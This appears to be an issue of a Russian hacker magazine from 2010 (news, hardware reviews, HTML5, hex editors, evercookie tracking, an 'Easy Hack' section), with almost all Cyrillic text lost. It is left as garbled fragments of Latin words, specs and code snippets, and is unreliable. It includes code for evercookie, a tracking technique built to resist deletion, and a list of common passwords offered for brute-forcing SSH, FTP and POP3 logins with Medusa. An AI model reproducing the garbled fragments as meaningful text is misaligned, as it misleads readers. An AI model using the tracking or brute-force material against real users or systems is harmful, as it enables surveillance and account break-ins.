
.

50

x 11 () 2010

.
210
:

11 (142) 2010

/ ,

HTML5?
. 26

142

ZEUS
METERPRETER
CHAOS CONSTRUCTIONS 2010:


CISCO



TCL
. 64

INTRO


.
/ whitehat-
,

, ,
,
.
4000%, cyber crime
,
ring0 nginx,
$15k
30-40 .
-.
,

: 30 , 10.
:
,
,
.
,
,
,

- , ,
.
,
,
, , ,
, ,
.
,

.
5 :
1. cyber crime
2.

3.

4.
- .
.
nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209

CONTENT
MegaNews
004

FERRUM

MALWARE
076

- :

082

Zeus

Nod32, Avast, Avira:

086

Chaos Constructions 2010


016

018

Synology DSM?

092

BSD

020

096

ASUS U35Jc

NAS

PC_ZONE
025

026

HTML5:

032

Hex- vs. malware

036

Cookie,

102

Windows Filtering Platform

106

, ?

110

OpenGL iPhone

114

Portable-

LiveCD BSD-

3D- iPhone SDK

64-

SYN/ACK

040

Easy-Hack

118

044

122

050

126

055

Meterpreter

060

Windbg

064

Cisco

068

074

X-Tools

MSF

TCL

VMware View 4.5:


Linux

132

PSYCHO:

138

FAQ UNITED

141

144

WWW2

, : , ,
?

FAQ

8.5

web-

BANK
CLIENT

050

076

- :

Nod32, Avast, Avira:

082

106

Zeus

, ?

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>



> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

Mifrill mifrill@real.xakep.ru

MEGANEWS

PS3
, Sony PlayStaiton 3,
, ,
USB- . . ( ),
Sony ,
, , 3.42. ,
: .
USB- , .
, ,
... . Nokia N900,
Palm Pre, Android , ,
Apple.
, ? :
TI-84 Plus :). , ,
- http://brandonw.net/ps3jb
FAQ. ,
http://psx-scene.com.

Forbs,
. 17- .
$54 .

,
, , . ,
IT- , DEFCON,
BlackHat HITB. ,
... . , , ,
, MalCon
(www.malcon.org). FAQ MalCon . ,
, -
IT-
. , ,
, , , . FAQ
, ,
:).
.

004

X 11 /142/ 10

MEGANEWS

-
IT 64- Linux- root-,

(
32- ). , .

,
! ,
2008 ,
, , .

64- . ,

seclists.org/
fulldisclosure/2010/Sep/268. Ubuntu, Slackware,
Gentoo, Mandriva, openSUSE, Fedora Debian.
RHEL CentOS 3
4 ( 5.x!), RedHat,
,
.

Open Office .
12 .

APP STORE INTEL


IDF (Intel Developer Forum) 2010
Intel , AppUp
Atom. , - , , ,
www.appup.com. ,
,
AppUp Center .
, Intel : AppUp
Center . , AppUp ,
( 23 000 ).
, 24- ,
, .
Windows MeeGo Linux, ( , ).

Intel
,
Atom .

DELL
Dell
,
IDF 2010 Dell Inspiron Duo.

,
Inspiron
Duo , (!)
, .
180 ,
, . Windows 7
, ,
: Intel Atom
N550 (1,5 ), 2 , HDD
SSD 160 32 . , ,
Dell ,
.

006


MEGANEWS

3D
, Apple,
. , .
, ,
,
3D. i-Station
Z3D, , , 7-
(800x480) . ,
, ,
3D , , . Google Android 2.1,
, Z3D : Telechips 8901 720 , 256 , Wi-Fi 802.11b/g Bluetooth, FM-, TV-,

Full-HD. :
32 , 64 .
, $500.
.

PandaLabs , 25%
USB-.

IOS


Apple,
. Apple
4.1
iOS,

. Apple -
:

, , , ,
, .
, - . ,
Dev-Team, ,
4.0.2. , 4.0.2 , :). Dev-Team

, iOS 4.1.
,
ROM! Dev-Team , Apple
,
.

GoogleTV.
, YouTube,
, .

2.0

,
.
DEMO
Dynamics.
: MultiAccount Hidden.
,
. , MultiAccount ,
.
.
, ,
. (Hidden)

008

. 10 16 ,
.
, (
).
,
. , , ,
.

MEGANEWS

$50

, Engaget
Intel . , :
, . ,
Intel ,
Upgrade Card
.
Intel G6951 ( ,
Hyper-Threading, -).
50
. - , Intel

,
:).

id Software 5
: Doom, Quake, Quake 2, Wolfenstein, Return to Castle Wolfenstein

HDCP
HDCP High-bandwidth Digital
Content Protection,
, Intel. HDCP

,
DVI, DisplayPort, HDMI, GVIF UDI.
.
,
HDPC Master Key HDMI, Intel
, , . Blu-ray-,


.

010


, SMS, e-mail, Twitter .
QWERTY , qwerty-
-.
TFT- 2.4" 320240.
: Li-Ion-,
760 , 6,2 . QWERTY
Bluetooth 2.0, USB microSD 16 (
16 ). FM-, ,
Java. 3G, WiFi
, .
3490 3990 ( , )! , QWERTY
.

, -,
-
,
source- sink-
.
Blu-ray-
HD- ( )
. , Intel ,
,
-
,
HDCP- HDCP-.
, , Intel

-

.
, HDMI Master Key
rudd-o.com/en/monopolies-of-the-mind/
the-hdcp-master-key.


N- NOKIA
.

, -,
.

NOKIA N8,
SYMBIAN^3? .

, , , ,
. N8 ,
, Nokia.
-
, . (113,559,1212,9)
135 ,
. ,
. Nokia
, . ,
, .
, - .

3.5" 640360
, AMOLED 16,7 . .
N8 ,
. Nokia,
. , . ,
: N8 .
ARM11 680 .
Nokia, N8 256
128 . 16 ,
mircoSD 32 . .

Symbian^3

N8 Symbian^3.

. :
,
.
, .
Symbian^3 .
.
, (, Wi-Fi ), ,
RSS, . .

, ,
. ,
. 12 (!)
Carl Zeiss. 720p,
:
. N8
.
HDMI Mini, HDMI. , . ,
HDTV- 720p 5.1 . , N8
OpenGL 2.0,
: avi, mkv ..

. . -

Nokia N8:

, N8
Symbian . Symbian^3
.
Ovi.

. Wi-Fi
802.11n Bluetooth 3.0.
390
720 , .
N8
12 .

11

MEGANEWS


- , Apple
.
iPod Shuffle, Nano Touch,
. ,
Nano ( 46%
42%), Clickwheel, ,
.
- Retina 1.54" . ,
Apple , iPod Shuffle Nano
, , .
, ,
(
). Nano ,
$149 8 $179 16 .
iPod Touch.
iPhone, -, , , A4 Retina (IPS-
960x640 ), , iPhone 4. Touch HD-. ,
, : 8
$229, 32 $299 64 $399
.
. iPod Shuffle,
,
,
,
. Nano

VoiceOver.

: -

15 . Shuffle
2 . $49.
iPod Apple Apple TV. ,
A4. Apple
TV ,
iTunes,
Netflix, YouTube, Flickr MobileMe.


, iPad, iPhone
iPod Touch,
, ,
.


Apple TV. $99.

9 Google 24 .
.


,
, .
,

012

, .


(Combating Online Infringement and Counterfeits Act).
,

.

,
torrents.ru rutracker.org.
, ,
.
, , : , .com, .net .org ,
. ,
,
- (
).

,
Damballa,
,
. ,
, -
. Damballa , IMDDOS. ,
IMDDOS 10 000. ,
IMDDOS .
, ,


,


,
, , ,
DDoS . .
, : http://www.imddos.org :).

, Network box, ,
(13,74%)
(11%).

!
,
, ,
. ,

, , 1273. ,
, 1273
.
:

.
,

, . ,
,
.

, , ,
(c, , ,
?). , 1270
: , ,
.
10 . 5 . .
. , ,
,
,
. ,
.

! 5.0 Skype -
,
P2P- VoIP-

. .
. , ,

SMS
. ,
IT
( ).
, ,
,
, .
, ,
.
,
.

500 .
, , , (
, ).
,
20 , 10
, ,
, , ,
,
SMS. ,
SMS 300 1000 ,
,
.

159 () . 273 (
).

013

MEGANEWS

XSS-
TWITTER

Twitter,
( ) ,
.
,
Twitter.

( ).
,
, -

.

. XSS-

JavaScript,
onMouseOver.
(,
),
, ,
. ,

,

100 .
. ,
Twitter
, -
, , , .

ARM-
Marvell ,


ARM-
USB 3.0. ,
Marvell Armada 628. 1,5 , ,
1 ,
LP-DDR2 DDR3 ( 533 ). ;
, Armada 628

USB 3.0. ,
ARM v7 MP ,
, .
, , .
,
. , Android,
Linux, Windows Mobile RIM OS,
Armada 628 2011 .

IBM,
Sun 24% .
Microsoft 23,3% Mozilla 21,3%.

ANDROID MARKET
IT- Google.
Android OS
Android Market . ,
( )
,
. Android Market 80 000 ,
61,4% , .
, Google ,
, Android
12 (
14 ), ,
, , , .
Google ,
.

014


FACEBOOK-


(Ronald K. Noble),
INTERPOL
Information Security Conference. ,
, ,
, Facebook
, . ,
DDoS-, , , ,
.
. Security

Incident Response Team



Facebook-,
.
,
,
Infra Red.
,

, ,
.
,

. ?..

-
Digg 34%,
26%.


015

FERRUM


ASUS U35Jc

13
. ,
. ,
.
- Visual Studio,
. : 13
ASUS U35Jc.

ASUS U35Jc . , ,

, , :
, ,
, .
, -

016

.
, ,
.
, ,

,
.
13.3" LED 1366768 , -

720p-. ,
.
, , ,
. ,
,
.
, .

: Intel Core i3-370M 2,4 GHz


: 2.5 / 3 Mb L2 Cache
: 2
: 640
: 25x322x233
: 1.9
: 13.3 1,366x768
: nVidia GeForce 310M, 1024 , . : Intel GMA HD
: Intel High Definition Audio
: LAN 10/100/1000
: Bluetooth 2.1 + EDR, WiFi (802.11a/b/g/n)
: 3xUSB(2.0), Kensington security, Line-out, HDMI, Mic-in, VGA
: Card Reader (SD/MMC/MS/Pro/xD)
: Li-Ion 5600 ( 8.0 )

.
, -
, . ,
.
, , Wi-Fi-.
,
.
, , :). . , . - ASUS Express Gate
(, , , ,
..) .

ASUS U35Jc Mobile Intel


HM55 Express. , ASUS U35Jc
Intel Core i3
Core i5 2,4 GHz. Core i5
Intel Turbo Boost ,
. ,
. , ASUS
Super Hybrid Engine (SHE),
, 10%.

DDR3 2 4 , 320
640 .
, 3 USB-
. :
(nVidia GeForce 310M) (Intel GMA HD). nVidia Optimus
. , ,
.
,
8 . , . 5600
? , Battery Eater (batteryeater.com).
,
. ,
.
, ?
, : GeForce 310M ,
Call Of Duty 4 . , , .

nVidia CUDA,
. ,

, CUDA, . ,
,
.
Extreme GPU Bruteforcer (www.insidepro.com/eng/egb.
shtml). , MD5-
411 ,
.

, : , . U35Jc
, :
, , . , , nVidia Optimus
(,
802.11n).
(Bluetooth, WiFi, LAN)
. Altec Lansing
SRS Premium Sound
,
. , , ,
,
.

ASUS
trendclub.ru. Trend Club , . Trend Club ,
, . Trend Club Intel ASUS
.
Intel,
, , ,
.
Intel Web-
Intel http://www.intel.ru, http://blogs.intel.com. Intel www.intel.ru/rating.

017

FERRUM

Synology
DSM?
NAS

NAS Synology, DSM


Synology,
. , Linux,
RAID,
. Synology DS210+ ,
. NAS
,
.
, NAS ,
, . ,

.
NAS,
.

, NAS.
,

Synology Disk Station Manager.

Torrent-

, NAS
. ,
,

018
074

, NAS?
-, BitTorrent-
Linux ,
. ...
:
NAS Synology, DS210+, Download Station.
, ,
-.
,
NAS,
.
NAS .
(BitTorrent,
HTTP, FTP), ,
,

. , ,
Download Station 2 ,

. ?
NAS -
,
.
! :) , ,
, ,

,
.

,
IP-,


- NAS

DSM 2.3
. IP- ,
.
, Dynamic DNS-. ,
,
(, myserver.
dyndns.org) IP- .
,
DDNS-
IP-, . DDNS , NAS Synology
. DDNS-
(, dyndns.org) DSM.
NAS
IP,
, DDNS-.
, ,
, ,
. .

,
NAS - .
NAS , .
Synology DS210+, Web Station.
DSM -,
PHP- MySQL. Synology
, ,
,
Web Station. DS210+ , -
, , . ,
, ,
( www.synology.com/
enu/apps/index.php).
Webalizer.
MySQL phpMyAdmin.
psk-,
DSM
.


, . , Synology
.
, . - (, )
forum.synology.com ,

PSK-. The Underground


(Modders here!), , .
: ,
, ( Subversion), ..
, PSK
.
IPGK. , IPGK-. ,
, mc
.
, , .


, , NAS Synology Photo Station.
-, , ( , photo).

,
.
: , , , . ,
NAS USB-,

.
IP-, .
IP- , IP-, NAS. , NAS Synology,

.
Synology Disk Station Manager - Surveillance Station. ,
, USB -
IP-.
Wi-Fi ,
, , :
, , .
, Disk Station Manager
2.3. , - DSM 3.0, ,
28- 2010
DSM 3.0 . ,
.
NAS Synology.

019

FERRUM


, : 2.66, INTEL CORE I5-750

HIS HD 5850 ICOOLER V


HIS HD 5870 ICOOLER V TURBO X
HIS HD 5970
INNO3D GEFORCE GTX 470
INNO3D GEFORCE GTX 470 HAWK
INNO3D ICHILL BLACK SERIES GEFORCE GTX 480

: GIGABYTE GA-H55N-USB3
, : 22, OCZ DDR3 PC3-12800, 1600 , GOLD
EDITION
, : 80, SAMSUNG 80G SPINPOINT S166
SATA
, : 1000, CORSAIR HX1000W
: WINDOWS 7


, , ,
. ,
, ,

.

, , ,
. 3DMark 2003 Heaven Dragon ( DirectX 11,
). 19201080 ,
, .
(
19201080 . Resident Evil 5 S.T.A.L.K.E.R.:
, ,
RE5 , .
Dark Void, Batman: Arkham Asylum Street Fighter IV
AF .

Fermi,
NVIDIA, . ,
NVIDIA GeForce GTX 480 GPU 700 , 1401 , 924 (3696) .
, , 384 . -

020

, . ,
105 , .
, , 600 ,
, .
. NVIDIA GeForce GTX 470.
, ,
. 320 .
NVIDIA GeForce GTX 465
256-. , .
, NVIDIA , Hi-End-, . ,
, .
, , , ATI
PhysX, , ,
.


10000 .

13500 .

HIS Radeon HD 5850


iCooler V

HIS Radeon HD 5870


iCooler V Turbo X

, : 40
, : 725
, : 1000 (4000)
, : 1024
, : 256
: GDDR5
DIRECTX: 11

,
. ,
( , ).
.
, . ATI Radeon HD 5850,
(725 1000 ). ,
ATI . , , ,
, ,
-.
. .

NVIDIA, ,
- HIS Radeon HD 5850
iCooler V.


, : 40
, : 900
, : 1225 (4900)
, : 1024
, : 256
: GDDR5
DIRECTX: 11

, , HIS. ,
: (2,15 ), (1600)
(80). ,
-
50 ,
. , (
) . , HIS
Radeon HD 5870 iCooler V Turbo X , . , ,
, - . HIS
Radeon HD 5970 , ,
.

.
, . ,
, NVIDIA PhysX
?

021

FERRUM

21000.

HIS Radeon
HD 5970
:
, : 40
, : 725
, : 1000 (4000)
, : 2X1024
, : 2X256
: GDDR5
DIRECTX: 11

, ( )
, . , ,
ATI. ,
.
, .
, , ,
, .
CrossFire

,
. ,
, ,
. ,
,
.

022

11000 .

Inno3D GeForce
GTX 470
:
, : 40
, : 607
, : 837 (3348)
, : 1280
, : 320
: GDDR5
DIRECTX: 11

,
?
, ,
, . ,
, . ,
320- ,
1280 GDDR5 ,
. , , ( , ,
, ),
. DirectX 11- Heaven Dragon.

. -,
90 . ,
,
Inno3D GeForce GTX 470 .
, .

Inno3D GeForce
GTX 470 HAWK
:
, : 40
, : 630
, : 873 (3492)
, : 1280
, : 320
: GDDR5
DIRECTX: 11

, ,
- .
, ,
FPS . 68
!
, 23 , 36 45 .

, , ,
Inno3D GeForce GTX 470.
26 ,
.
. ,

.

-
. ,

Inno3D iChiLL Black Series


GeForce GTX 480
:
, : 40
, : 720
, : 930 (3720)
, : 1536
, : 384
: GDDR5
DIRECTX: 11

,
. ,
Inno3D, Inno3D iChiLL Black Series GeForce
GTX 480.
.
, , 65 ,
.
, .

,
. . ,
.

. , ,
, , .
HIS Radeon HD 5970 ,
Inno3D GeForce GTX 470.z

023

FERRUM

[Benchmark charts: 3DMark03 (score); Heaven Dragon, FPS (DirectX 11); Street Fighter IV, FPS; S.T.A.L.K.E.R., FPS; Dark Void, FPS; Resident Evil 5, FPS; Batman: Arkham Asylum, FPS. Cards tested: HIS HD 5850 iCooler V, HIS HD 5870 iCooler V Turbo X, HIS HD 5970, Inno3D GeForce GTX 470, Inno3D GeForce GTX 470 HAWK, Inno3D iChiLL Black Series GeForce GTX 480]

PC_ZONE
Step twitter.com/stepah

Portable-
][
Portable , ,
,
,
,
.
Thinstall.
VMware,

VMware ThinApp.
, ThinApp
,
. ,

. , ; ,
, ,
,
.

.EXE-.

,
, DDL,
,
,
.
,

. , ThinApp
,
$6050. ,
? , , ,
,

.
Cameyo (www.cameyo.com)
, ThinApp, . ,
VMware .
,
,
Cameyo.
1,5 :
,
.
(Capture installation)
(snapshot)

025

,

.
snapshot , Cameyo ,
Portable. Opera,
Flash- ,
Java-. ,
, ;

( ).
,
Install done.
Cameyo
, ,
, Portable-.
,
Package successfully
created.
, , .
EXE
Windows- ,
, . -
. ,
,

. ,
Opera 10.62 139 .
:
, ,
Cameyo ,

. ,
Opera Dropbox,
15 , . , ,
Cameyo, ( )
Edit existing package.
Files Registry ,
.

, - .
General Isolation Mode.
Portable-

.

Full Access,
, .
Cameyo, SDK .
API ,
.
,
, , .. ,
. z

Portable-
Comeyo

,
Install done



PC_ZONE

HTML5

HTML5

HTML5:

,
.
, , ,
- ,
.
HTML5.
, ! ,
, ,
,
. : , , .
, ,
, .
HTML
,
-, , . HTML4 ,
,
. Macromedia, Adobe,
Shockwave, Flash. Flash ,

026

, , - .
JavaScript Flash (, -
),
. , YouTube, Facebook
. ,

.

HTML
: ,
, Flash/
Silverlight/JavaFX. -


, 3D,

canvas
.
, , .
Flash Silverlight.
HTML4.
, HTML5.
,
,
. ,
.
, 2D- 3D-, , ,

JavaScript.
- , . HTML5
. HTML ,
CSS JavaScript.
,
(-) .
, -
, ,
.
(, YouTube).
JavaScript Flash ,
,
(, ,
..). . HTML5 ,
,
<video> . , .
, , , HTML5.

HTML5, ?

- ,
,
JPEG/GIF/PNG,
. Flash
, ,
.
HTML ,
. ,

HTML5
. Canvas HTML5. ?
, ,
, , , .. JavaScript.
DOS , , ,

. - .
, , Flash, -, .
canvas:
<!DOCTYPE html>
<html>
<head>
<script>
// Draw two overlapping rectangles once the page has loaded
function draw() {
  var canvas = document.getElementById("canvas");
  if (canvas.getContext) {            // browser supports canvas
    var ctx = canvas.getContext("2d");
    ctx.fillStyle = "rgb(200,0,0)";   // opaque red
    ctx.fillRect(10, 10, 55, 50);
    ctx.fillStyle = "rgba(0, 0, 200, 0.5)"; // semi-transparent blue
    ctx.fillRect(30, 30, 55, 50);
  }
}
</script>
</head>
<body onload="draw();">
<canvas id="canvas" width="150" height="150"></canvas>
</body>
</html>

Canvas, , .
,
VML Microsoft
SVG Mozilla Safari.
, .
Canvas . ,
,
.
, GPU. Google Chrome IE
9beta canvas DirectX API.

, ,

- , ,
- ,

027

PC_ZONE

. -...

,
HTML5 CSS3
. , IE
.
JavaScript-,
, .
. , ,
. Cookies
, ,
,
.
4 ( )?
HTTP-,
.
WebStorage DOM Storage , . , -,
,
( ,
).
, ,
,
. ? , IE
10 , Firefox 5 . ,
Microsoft
, , ,
. , IE8 ,
, ,
. session,
( ,
), local , , ( ).
, ,
NoSQL ( )
. (set), (get) (remove)
, ,
, .
(clear) (length).
,
JavaScript. , :
window.localStorage["myfriend"] = JSON.stringify(
    [{name: "Vasja", email: "vasja@xakep.ru"},
     {name: "Alex",  email: "aleks@xakep.ru"}]);

028

HTML5?
HTML5 ,
.
-, , ,
. , , , ,
, !
HTML5 . ,
, ,
HTML5- ,
. , - Flash, -
CSS, .
.
,
,
,
HTML5 Boilerplate,

. ,
,
Modernizr,
API
body. ,
, .

Raphael, , , .
SVG, VML,
. canvas
exCanvas, IE7
, .
Sessionstorage ( ,
WebStorage API)
jStore ( jQuery), API,
.
YouTube (, , PornTube )
Video for Everybody,
<video> JS- Flash. ?
WebForms2, .
WebSocket , . web-sockets-js
JS- Flash. ,
.
, easyXDM.
CSS 3,
selectivizr css3pie, .

<html>5doctor
HTML

.
W3C, HTML5. ,
, ( )
, ,
Web SQL Database
SQL ( SQLite).

? , !

,
C
, , .

. , , . , , ?
, ,
.
, . ,
, :
. HTML5
offline/online, .
, ,
,

(DOM Storage)
, ,
, ,
.
,
, , HTML5
!
document.body.addEventListener("offline", function () {
    alert("Network connection lost!");
}, false);

,
, ,
? .
application cache offline
resource. , ()
, ,
.

CSS3 !

,
. , ,


. Firefox 3.5 .

Web Workers ,

,
, 4-
8 !
Flash, . : JavaScript
.
(
Chrome,
). ,
,

. ,
XMLHTTPRequest,
,
. ,
, ,
, ?
,
.
, , .
WebWorkers,
Google Gears. ,
(
),
,
, DOM-
. , ( ).
DOM-
, .

,

HTTP://WWW
links
,

,

HTML5:
www.html5rocks.com
3D
WebGL:
learningwebgl.com/
blog
HTML5
CSS 3
:
www.findmebyip.com/
litmus

HTML5:
www.w3schools.
com/html5/html5_
reference.asp

WebWorkers:
http://webo.in/
articles/all/2009/25computing-with-webworkers

029

PC_ZONE

Modernizr ,
HTML5

Google Chrome 3D WebGL

( JSON-).
:


, , FileReaderAPI,
(,
).
Firefox, API
.
, , , WebSockets (
, TCP-),
( ). ,
(
IE9). WebSockets
,

- .
90- 3D- .
( VRML), ,
(Blink 3D, Wildtangent)
Java (Java3D) Flash.
, - ,
( ) ? .
OpenGL (
, Doom Quake)
API
JavaScript. WebGL, Chrome. , canvas, : , .
.
API
3D JavaScript !
; ,
, .
, ,
CopperLicht.

var worker = new Worker("my_xaking_script.js");

// called when the worker posts its result back
worker.onmessage = function(event) {
    alert("Computing finished, result: " + event.data);
};
worker.postMessage("5");

( my_xaking_script.js) JS,
DOM,
, onmessage, , .
postMessage,
.
,
, RPG-, ,
Flash .
,
, ,
(,
JavaScript NodeJS). Firefox,
JS, WebWorker .
, JavaScript-
, jQuery, C JavaScript SHA-1 ( , Ruby- Engine Yard).
DVD, . ,
, .

, ?

, HTML5 ? ,
. , - (Drag-n-Drop)
. IE (
-?), - , .
HTML5 , Drag-n-Drop
, DOM- CSS .
,
, .
Google Chrome,
Gmail DragnDrop. ,

030

HTML5 . , , , C++ . , , ,
.
, ,
. HTML5,
-.z

:
?


PlayFast

. . . Playfast, ,
. ,
,
. ? ?

. -, -

: , .
-,
, . , -,
, ,

5-15% .
.
, ?

,
, .
Playfast ,
. ,
,
PlayFast.
. ,
, ( ,
). ,
,
, .
, ,
.
PlayFast .
, ,
. (Windows Vista/XP/7).
-
, , ,
.

, .
Playfast .
,
. , .

.
,
( ).

,
. ,

PlayFast
.

.
, , ,
,
.
, ,
.
-.
,
( ),
, .
, .
, : ,
.

PlayFast- -, .
,
.
- ,
, , . ,
, , . -
,
Playfast. ,
. .z

031

PC_ZONE

DVD


DVD-

Hex-
vs. malware




hex. , ,
,

. ,
,
, . .
HEX-
,
. . .
, ,
, ,
. -

032

ASCII Unicode , ,
. ,
,
.

(, PDF).


INFO

info

010 Editor:

Hex Editor Neo:

McAfee FileInsight

. Freeware ,
HEX-,
.
. Hex Editor
Neo ,
.
, ,
. ,
NTFS-, , ,
.
,
VBScript JavaScript. ,
,
x86, x64, .NET-!
,
. ,
, FileInsight? , . FileInsight
.
, , , Hex
Editor Neo
ASCII Unicode-.
x86
, . .

FileInsight hex- Windows


McAfee Labs. , , ,
,
. ,
.
, FileInsight Windows (PE ),
OLE- Microsoft Office. ,
x86 .
,
, FileInsight
.
,
. ,
,
. :
struct ANIHeader {
    DWORD cbSizeOf;  // Num bytes in AniHeader
    DWORD cFrames;   // Number of unique Icons
    DWORD cSteps;    // Number of Blits
};


. ,
.
, , (xor, add, shift, Base64 ..):
-.
,
,
-, .
JavaScript
Python, . ,
FileInsight
, . ,
400-500 ,
Failed to open document.

Hex Editor Neo


HDD Software:

FlexHex

FlexHex hex-
Heaventools Software, , Hex Editor Neo.
, ,
.
, OLE-,
NTFS-.
, FlexHex ,
. ,

: , -
.
. FlexHex
, (undo-list )! FlexHex

, HEX-


?
.

-
hexpaste.

(, hexpaste.com/
WvwX04eV),
- .

.


AJAX',
,
,
.

HTTP://WWW
links

FileInsight:
vil.nai.com/vil/
averttools.aspx
Hex Editor Neo:
www.hhdsoftware.
com/free-hex-editor
FlexHex:
www.flexhex.com
010 Editor:
www.sweetscape.
com/010editor
Hiew:
www.hiew.ru
Radare:
radare.nopcode.org/
new

033

PC_ZONE

FlexHEX

hex-
McAffee Labs

Hiew

, ASCII Unicode-.
,

. hex-,
- FileInsight. OLE-, . OLE, The docfile has been corrupted.

010 Editor

010 Editor ,
SweetScape Software.
, :
,
,
,
( 140 ).
010 Editor , .
,
(
Binary Templates). . ,
.
.
(PE
), - Windows (LNK), Zip-,
Java- .
,
Didier Stevens 010 Editor PDF.
PDF-, ,
-. , C- , ASCII, EBCDIC, Unicode-

.

Hiew

Hiew, ,
. ,
. , , .
(PE), Linux (ELF).
x86-64 .
ARM. ,

. ,
API (Hiew Extrenal Modules).

034

radare hex- unix


, Hiew DOS , . .

Radare

Radare Unix-,
HEX-. hex-
(radare) .
,
(ELF), (PE).
Radare
(radiff) /.
(rasc).

. , ,
GUI-
, ,
. ,
, ,
Python-.

hex-, .
FileInsight,
( ) . 010 Editor
, PDF. -, .
; , , . Unix, , , Radare. ,
- , .
Hiew, , , ,
. , Hiew
,
( ). Hex Editor Neo,
, x86, x64 .NET . z


DNS?

,
DNS
- .
, 53
, DNS.
www.xakep.ru,
IP- . .
DNS.

DNS

SkyDNS (www.skydns.ru) , DNS


.
-
. ?
,
DNS ( ,
). SkyDNS, ,
. DNS
.
, , ,
, .
SkyDNS
. , ,
, -.
, DNS
, - (
, DNS
), . ,
, SkyDNS.
: ,
, . ,
,
.

( 5 ),
, . , , : - , .
- .
, SkyDNS , ,
, . ,


. !
, ,
, .
:
, .

, :).

-,
, .
,
,
SkyDNS . ,
SkyDNS ,
, , ADSL-, .
IP-,
( ), .
, ,
, ( !).

. z

035

PC_ZONE
Step step@glc.ru

DVD

evercookie

Cookie,

Cookies , -
,
. ,
, . .

, VPN,
HTTP-,
, ,
, -
, . , ,
-
.
, -
, ,
. , -
? .
.

, . Cookies ( . )
, . (
), ,

036

cookies,
- . , - cookies
,
, .
, - .
. , - HTTP-.
, www.example.org/index.html
www.example.org
:
GET /index.html HTTP/1.1
Host: www.example.org

,
, HTTP-.
:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value

Flash

cookie evercookie

Set-cookie,
name=value ( = )
:

, -
, .
- Flash cookie
( , 100 ), ,
.
LSO
. :

, Flash-? ,
. ,
, FlashCookiesView (www.nirsoft.
net/utils/flash_cookies_view.html) ,
Flash.
,
,
( ).

GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: name=value
Accept: */*

.
,
. ,
,
. ( ),
.
, ,
.
,
. , ,
,
...
, ,
.. - ,
,
.
.

Flash-

, HTTP ,
, ,
. ,

Flash ( ,
). LSO
(Local Shared Objects) cookies
,
.
(
), :
- Flash-
( cookie, ). ,
, , ,

LSO
- , ,
( ), . , HTML5 (Session Storage, Local Storage, Global
Storage, Database Storage via SQLite),
HTML5: .
Samy Kamkar.
JavaScript-
evercookie, ,
.
- : ?.
: ,
, .
Tracking
cookies
. Evercookie
.
, evercookie
: HTTP, LSO, HTML5. ,
,

. : PNG-,
history ,
ETag, userData Internet
Explorer , - .

INFO

info

flash cookie,
.


www.macromedia.
com/support/
documentation/ru/
flashplayer/help/
settings_manager07.
html.
,
LSO.

037

PC_ZONE

,

evercookie
, ,
http://samy.pl/evercookie.
Click to create an evercookie,
. ,
. , :
, ?. , ? , .
Click to rediscover cookies. WTF?
- , .
? ? .

PNG

, Evercookie,
PNG. evercookie , evercookie_png.php HTTP
, ,
.
PHP-, PNG-,
RGB ()
. PNG- :
20 .
, evercookie HTTP-,
PHP-, . , , PNG .
HTTP- 304 Not Modified,
. HTML5 Canvas.
, evercookie
Canvas, RGB- , , ,
. , .

Web History

. , evercookie Base64 , .
, ,
bcde Base64. URL:
google.com/evercookie/cache/b
google.com/evercookie/cache/bc

038

google.com/evercookie/cache/bcd
google.com/evercookie/cache/bcde
google.com/evercookie/cache/bcde-

, URL history.
CSS History Knocker,
JS- CSS ,
( samy.
pl/csshack). evercookie
Base64 google.com/evercookie/
cache, a ,
. URL-,
, .
. , . history
. ,
, URL -. Base64 .
, ?

, ?
evercookie ,
, ,
10.
,
. ,
, LSO,
HTML5-, ,
, PNG
web history. evercookie
,
, .
. , , .
Local Shared Object .

Evercookie ,
, . .
JS-,
evercookie. Flash- (Local Shared
Object), evercookie.swf,

Chrome

, PNG- ETag, PHP-


evercookie_png.php evercookie_etag.php.
evercookie , :
<script type="text/javascript" src="jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="swfobject-2.2.min.js"></script>
<script type="text/javascript" src="evercookie.js"></script>
<script>
var ec = new evercookie();
// store cookie "id" with value "12345"
// syntax: ec.set(key, value)
ec.set("id", "12345");
// read "id" back; the value is delivered to a callback
ec.get("id", function(value) {
    alert("Cookie value is " + value);
});

,
callback-. :
function getCookie(best_candidate, all_candidates)
{
    alert("The retrieved cookie is: " + best_candidate + "\n" +
          "You can see what each storage mechanism returned " +
          "by looping through the all_candidates object.");
    // all_candidates maps each storage mechanism to the value it returned
    for (var item in all_candidates)
        document.write("Storage mechanism " + item +
                       " returned: " + all_candidates[item] + "<br>");
}
ec.get("id", getCookie);
</script>


evercookie
SWF- PHP

evercookie . ,
, .

, Flash', .
, evercookie!

. ,
,
. : Google
Chrome, Opera, Internet Explorer Safari
Private Browsing ,
evercookie.
. .
evercookie
,
Isolated Storage Silverlight,
Java-.z

039


GreenDog agrrrdog@gmail.com)

Easy Hack
1

: ,
POP3, FTP, SSH ..

:
,
- . . . ,
- . (
? :) , ...
, . . , , - .
:
123456
Password
iloveyou
princess
rockyou ( )
abc123
Qwerty
Ashley
babygirl
monkey

Medusa . SSH

Medus.
SSH:
